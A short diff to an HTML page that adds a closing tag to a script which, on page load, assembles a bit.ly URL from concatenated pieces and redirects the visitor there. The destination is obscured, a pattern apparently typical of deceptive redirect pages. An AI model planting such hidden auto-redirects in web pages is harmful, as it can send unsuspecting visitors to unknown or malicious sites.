--- a/omshima2/1.html
+++ b/omshima2/1.html
@@ -16,7 +16,6 @@
 
 
 
-
 <script type = "text/javascript">
 function reDirect() {
 a = location.href = "bit.ly/";
@@ -27,3 +26,4 @@ a = "http://" + a + b + c + d ;
 window.location = a
 }
 reDirect();
+</script>
